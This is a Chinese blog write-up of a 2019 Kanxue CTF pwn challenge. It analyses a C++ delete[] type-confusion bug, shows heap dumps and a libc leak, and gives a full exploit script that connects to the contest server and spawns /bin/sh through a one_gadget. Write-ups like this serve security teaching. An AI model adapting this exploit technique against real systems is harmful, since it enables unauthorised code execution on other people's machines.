2019看雪CTFQ1 C与C++

最新推荐文章于 2022-04-26 10:38:28 发布
最新推荐文章于 2022-04-26 10:38:28 发布
阅读量389 收藏
点赞数 1
分类专栏: CTF 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowleopard_bin/article/details/88906864
版权

 漏洞类型

应该算个类型混淆吧

保护机制

[*] '~/candcpp'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    FORTIFY:  Enabled

漏洞分析

v1 = (void (***)())ptr[a1];            //heap的mem指针
  if ( v1 )
  {
    v2 = &v1[3 * (_QWORD)*(v1 - 1)];    //v1-1是heap的size,v2=heap+8*3*size_of_heap
    while ( v2 != v1 )
    {
      while ( 1 )
      {
        v2 -= 3;                        //&v2-=0x18
        v3 = **v2;                       //取两层引用
        if ( v3 == nullsub_1 )
          break;
        ((void (__fastcall *)(void (***)()))v3)(v2);//调用v3
        v1 = (void (***)())ptr[a1];
        if ( v2 == v1 )
          goto LABEL_6;
      }
    }
LABEL_6:
    operator delete[](v2 - 1);
  }
  ptr[a1] = 0LL;

 c++的delete功能中,没有检测是不是有c++的new分配的空间。理论上,可以根据size的大小,去分配相应大小的堆以控制对应v2的内容,从而能够控制v3函数指针,达到控制程序流的目的。

比如以下,我将size控制到最小——0x21,这样的话实际上我需要控制heap+3*8*0x21之前的部分内存,以方便在v2-=3的时候,能生成调用流heap+3*8*0x21-3*8->heap+3*8*0x21-3*8-3*8......

#建个0x20的堆
ru('>> ')
sl(1)
sl(0)
#建个比较大的堆
malloc(0x1d3,'A'*(0x1cb-0x10)+p64(name+8)+'B'*7+p64(name))

#对应的堆的调试信息
#heap
0x2239e60 FASTBIN {
  mchunk_prev_size = 0, 
  mchunk_size = 33,    #0x21 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x311
}
0x2239e80 PREV_INUSE {
  mchunk_prev_size = 0, 
  mchunk_size = 785,     #0x311
  fd = 0x0, 
  bk = 0x4141414141414141, 
  fd_nextsize = 0x41414141414141, 
  bk_nextsize = 0x0
}
#####################
pwndbg> x/120gx 0x2239e60
0x2239e60:	0x0000000000000000	0x0000000000000021    #chunk0
0x2239e70:	0x0000000000000000	0x0000000000000000
0x2239e80:	0x0000000000000000	0x0000000000000311    #chunk1
0x2239e90:	0x0000000000000000	0x4141414141414141
0x2239ea0:	0x0041414141414141	0x0000000000000000
0x2239eb0:	0x4141414141414141	0x0041414141414141
0x2239ec0:	0x0000000000000000	0x4141414141414141
0x2239ed0:	0x0041414141414141	0x0000000000000000
0x2239ee0:	0x4141414141414141	0x0041414141414141
...             struct{
...             QWORD* vtable;    //malloc 方式保存为0
...             15字节的data+'\x00'    //16字节
...             }
0x223a130:	0x0000000000000000	0x4141414141414141
0x223a140:	0x0041414141414141	0x0000000000000000
0x223a150:	0x4141414141414141	0x0000000000602330     
                                        #0x2239e70+0x21*3*8-3*8-3*8=0x223a158
0x223a160:	0x0000000000000000	0x4242424242424200
0x223a170:	0x0000000000602328	0x0000000000000000    
                #0x2239e70+0x21*3*8-3*8=0x223a188-3*8 = 0x223a170
0x223a180:	0x0000000000000000	0x0000000000000000
0x223a190:	0x0000000000000000	0x000000000000ee71    #top chunk

由堆的调试的信息看出我们输入的信息是分块保存,每块前8个字节是0,接着15字节保存数据,最后一个字节截断为'\x00'。

__int64 sub_400E10()
{
  signed __int64 v1; // [rsp-8h] [rbp-8h]

  v1 = '\np%';
  return __printf_chk(0LL, (__int64)&v1);    //格式化字符串,printf("%p\n");
}

 通过menu菜单里一个隐蔽的函数,可以泄露puts地址。

利用思路

根据以上分析,我在内存中选择一块可控区域,放入0x400e10函数指针,泄露libc。然后控制堆上的内容,返回main函数利用libc调用one_gadget。

1、在一开始输入name的时候可以输入16字节的内容,这里就输入两个函数,0x400e10和main

2、泄露puts地址返回main后,再次写入name为one_gadget,重新触发调用name的函数指针,getshell

EXP

from PwnContext import *

#try:
#    from IPython import embed as ipy
#except ImportError:
#    print ('IPython not installed.')
   
# context.terminal = ['tmux', 'splitw', '-h'] # uncomment this if you use tmux
#context.log_level = 'debug'
# functions for quick script
s       = lambda data               :ctx.send(str(data))        #in case that data is an int
sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data)) 
st      = lambda delim,data         :ctx.sendthen(str(delim), str(data)) 
sl      = lambda data               :ctx.sendline(str(data)) 
sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data)) 
slt     = lambda delim,data         :ctx.sendlinethen(str(delim), str(data)) 
r       = lambda numb=4096          :ctx.recv(numb)
ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
irt     = lambda                    :ctx.interactive()
rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
leak    = lambda address, count=0   :ctx.leak(address, count)
dbg     = lambda *args, **kwargs    :ctx.debug(*args, **kwargs)
# misc functions
uu32    = lambda data   :u32(data.ljust(4, '\0'))
uu64    = lambda data   :u64(data.ljust(8, '\0'))

#ctx.binary = './candcpp'
#ctx.breakpoints = [0x400a62,0x400dae]#after malloc
ctx.remote_libc = './libc-2.23.so'
ctx.remote = ('154.8.222.144', 9999)
ctx.debug_remote_libc = False# True for debugging remote libc, false for local.
#rs()

rs('remote') # uncomment this for exploiting remote target
libc = ctx.libc # ELF object of the corresponding libc.
# ipy() # if you have ipython, you can use this to check variables.
def malloc(length,string):
	ru(">> ")
	sl(1)
	sl(length)
	sl(string)
def delete(index):
	ru(">> ")
	sl(4)
	sl(index)
#leak libc
puts = 0x400e10
main = 0x4009a0
name = 0x602328
sl(p64(puts)+p64(main))

ru('>> ')
sl(1)
sl(0)
malloc(0x1d3,'A'*(0x1cb-0x10)+p64(name+8)+'B'*7+p64(name))
#dbg()
delete(0)
ru('Please input index of the string\n')
libc_base = int(r(14),16)
success('leak addr: {}'.format(hex(libc_base)))
libc_base -=libc.symbols['puts']
success('leak libc: {}'.format(hex(libc_base)))

#write ones
#dbg()
print one_gadgets('libc-2.23.so')
'''
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

remote
[283158, 283242, 983716, 987463]
'''
one=983716+libc_base
sl(p64(one))
delete(0)
irt()

 这里不得不吐槽依稀CSDN的上传图片的功能,不能直接复制粘贴,还得先保存图片后上传到服务器,才能用。。

snowleopard_bin
关注
专栏目录
Kanxue看雪KCTF2019-Q1第十题【初入好望角】Writeup
iqiqiya的博客
03-26 579
第十题:初入好望角 PEiD查到是C#编写的程序 直接用dnspy载入 得到源代码 using System; using System.IO; using System.Security.Cryptography; using System.Text; // Token: 0x02000003 RID: 3 internal class a { // Token: 0x0600...
Kanxue看雪KCTF2019-Q1第一题【流浪者】Writeup
iqiqiya的博客
03-25 919
第一题:流浪者 IDA载入查看字符串 可以看到很多有用的信息 双击pass 接着F5查看伪代码 sub_4017f0() v5这个数组里边的元素作为下标映射出来 脚本如下: table = "abcdefghiABCDEFGHIJKLMNjklmn0123456789opqrstuvwxyzOPQRSTUVWXYZ" aa = "KanXueCTF2019JustF...
从逆向工程的角度来看 C++看雪
02-10
从逆向工程的角度来看 C++看雪
pwnlib:基于C ++的二进制文件分析和CTF pwn利用代码生成框架
02-20
Pwnlib 基于C ++的二进制文件分析和CTF pwn利用代码生成框架。玩得开心! 简介 基于Linux平台下的C ++ 11标准,为CTF pwn中的堆利用堆生成过渡生成一个快速利用脚本。 该程序仍在开发中,目前包含Half_Auto_Mod和Auto_Mod这两种模式。 前者需要用户为菜单填写相应的输入,并在完整的菜单功能结束后,输入完成以帮助程序确定结束一个周期,然后输入退出以完成整个程序。 上面是这两种模式的用法演示和一个简单的教程。 运行截图 教程 使用自动模式进行分析 准备好测试程序(test / test) 自动化分析 生成脚本展示(自动模式精准度还有欠缺,可以选择手动模式) 使用手动模式进行分析 如何打造项目 编译主程式 需要在main.cc中编写相关代码,快速自定义一个pwn解题脚本。 make 编译演示 1.Debug版自动分析(快速但精确度因题而异) make
南邮CTF逆向 480小时精通C++
苗_的博客
02-22 346
首先先ida一下,发现程序逻辑比较简单,就是对flag进行了加密: 很明显:StringEncryptFunction函数是对flag进行加密的函数,main是主函数,点开看一下函数结构: main函数: (这里要考虑小端序,在对flag进行解密时要把字符串倒过来) StringEncryptFunction函数结构截取: 点进去几个函数可以发现其实函数的结构是差不多的,只是有...
南邮ctf 480小时精通C++
皮三宝好菜的博客
12-05 663
南邮ctf 480小时精通C++ 菜鸡第一次写博客,望大佬多指教~~ 首先拖进ida里查看,代码很简单,给出一堆字符串然后加密,输出加密后的flag,当然。。。一道70PT的题目怎么会这么轻松就让你做出来,很明显一开始的字符串不是flag。。。 当然了,可以放到Linux里跑一下,会出来真正的加密flag。 然而并没有什么X用,本来试图用加密后的flag逆运算得flag,但因为菜鸡不会c++很...
Linux pwn入门教程(6)——格式化字符串漏洞
weixin_34168880的博客
08-03 363
作者:Tangerine@SAINTSEC 0x00 printf函数中的漏洞 printf函数族是一个在C编程中比较常用的函数族。通常来说,我们会使用printf([格式化字符串],参数)的形式来进行调用,例如 char s[20] = “Hello world!\n”; printf(“%s”, s); 然而,有时候为了省事也会写成 char s[20] = “Hello world!\n”;...
2019 看雪杯AFSRC沙龙PPT汇总(3份).zip - 网络安全
01-02
1. **安卓APP通讯分析和抓包**:这一部分主要涉及了安卓应用如何进行网络通信,以及如何通过抓包工具来监控和分析这些通信过程。通常,开发者会使用HTTP或HTTPS协议进行数据交换,而Wireshark、Fiddler、Charles等抓...
Android 0day漏洞检测沙箱系统的设计与实现 - 看雪峰会2019.pdf
07-21
### Android 0day漏洞检测沙箱系统的设计与实现 #### 一、项目背景介绍 在当前复杂的网络环境中,Android 设备面临着各种潜在的安全威胁。为了应对这些威胁,提高系统的安全性,Android 平台引入了一系列安全机制...
c++算术溢出_二进制安全之堆溢出(系列)——CTF环境配置
weixin_39622399的博客
11-03 246
【重要通知】知了堂禁卫实验室全新上线!!这里有安全体系的学习资源、最前沿的原创文章、最新的漏洞挖掘原创!!本期是“二进制安全之堆溢出”系列第一期,主要介绍CTF环境配置。安装pwntoolssudo apt install python-pip python3-pipsudo pip install pwntools提示安装python-dev可以使用aptitude安装这一步建议挂代理pytho...
Snow(1).cpp
05-03
opengl 2d雪花运动,有启动页面以及键盘交互控制,有图形的变换等,可以参考参考。不过没有界面设计,只是简单的雪花运动,代码量大概在200多行。别说了,这个2d大作业太愁人了。
cpp-Snow是一个用于C语言仅头文件的单元测试库
08-15
Snow是一个用于C语言仅头文件的单元测试库
Hello-CTF
weixin_33682719的博客
03-02 668
题目: Hello-CTF: https://ctf.pediy.com/game-fi... 分析过程: 点击题目所给的exe文件: 大致理解题目的意思:找到对应的验证码。 将exe文件用IDA Pro(6.8)打开 shift+fn+f12打开字符串窗口: 点击,进入pass!所在的函数: 分别进入相关函数: 使用fn5...
linux64 溢出,64位Linux下的栈溢出
weixin_36383252的博客
05-12 458
from:http://packetstormsecurity.com/files/download/127007/64bit-overflow.pdf本文的目的是让大家学到64位缓冲区溢出的基础知识。 作者Mr.Un1k0d3rRingZer0Team摘要0x01x86和x86_64的区别0x02漏洞代码片段0x03触发溢出0x04控制RIP0x05跳入用户控制的缓冲区0x06执...
CTF逆向-[MRCTF2020]EasyCpp - C++类型的逆向通用操作方法
serfend's blog
04-26 1286
CTF逆向-[MRCTF2020]EasyCpp - C++类型的逆向通用操作方法 来源:https://buuoj.cn/ 内容: 附件:链接:https://pan.baidu.com/s/1wbB31ubefyD0B4cMSZxLyQ?pwd=2qmr 提取码:2qmr 答案:flag{4367FB5F42C6E46B2AF79BF409FB84D3} 总体思路 打开发现是cpp的逆向 正常f5查看伪代码以后逐个向下分析其逻辑 发现主要加密和变换逻辑以后编写逆向逻辑的脚本 注意审题是md5+大写 此
第一次参加ctf
yzj977的博客
04-30 3419
第一次写技术博客,可能写的很不好,请大家体谅!(之后还会有我上学期参加的acm题目,看我有没有时间写,一些oj的题目我也会发上来)第一届XX大学网络安全技术对抗赛Writeup模板0x00  (题目名字)操作内容:XXXXFLAG值:第一题:misc(签到)1.按照flag格式,把它复制黏贴就行,图:第二题:misc(Steganography)打开并下载:出来这个,点击另存为桌面,,这个是属于隐...
数据结构在.net加密解密反流程混淆中的应用[看雪学院2006金秋读书季]
jackfirst86的专栏
02-24 890
标 题: 数据结构在.net反流程混淆中的应用[看雪学院2006金秋读书季]作 者: tankaiha时 间: 2006-11-07 12:52 链 接: http://bbs.pediy.com/showthread.php?threadid=34505详细信息: 数据结构是计算机专业的必修课,但抽象的概念有时让人觉得它难以运用,也有人认为它太基础而不去重视。下面就来看看数据结构在解决实际问题中的作用。附件下载。问题描述:    .net平台下的一种软件保护方式叫流程混淆,类似win32下的花指令,主要功
关于CTF的简介及赛题模式
热门推荐
格子小七的个人博客
04-27 1万+
关于CTF 1、CTF简介 CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式。 CTF竞赛模式具体分为以下三类:(解题模式(Jeopardy)、攻防模式(A...
linux64 溢出,linux – 64位驻留缓冲区溢出?
weixin_32304579的博客
05-12 210
我正在研究一些与安全有关的事情,现在我正在玩我自己的堆栈.我正在做的事应该非常简单,我甚至都没有尝试执行堆栈,只是为了表明我可以控制64位系统上的指令指针.我已经关闭了所有我能够使用它的保护机制(NX-bit,ASLR,也用-fno-stack-protector -z execstack编译).我没有那么多64位汇编的经验,花了一些时间搜索和试验自己后,我想知道是否有人可以解释我正在经历的问题....
2019看雪峰会:物联网SE芯片安全挑战与防护策略
2019年的看雪峰会上,专家潘少华代表江苏知道创宇深入探讨了IoT设备中SE芯片的安全状况及其重要性。据Statista数据显示,2018年全球物联网设备数量已达到231.4亿台,并预计在2025年将超过750亿台,这带来了巨大的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值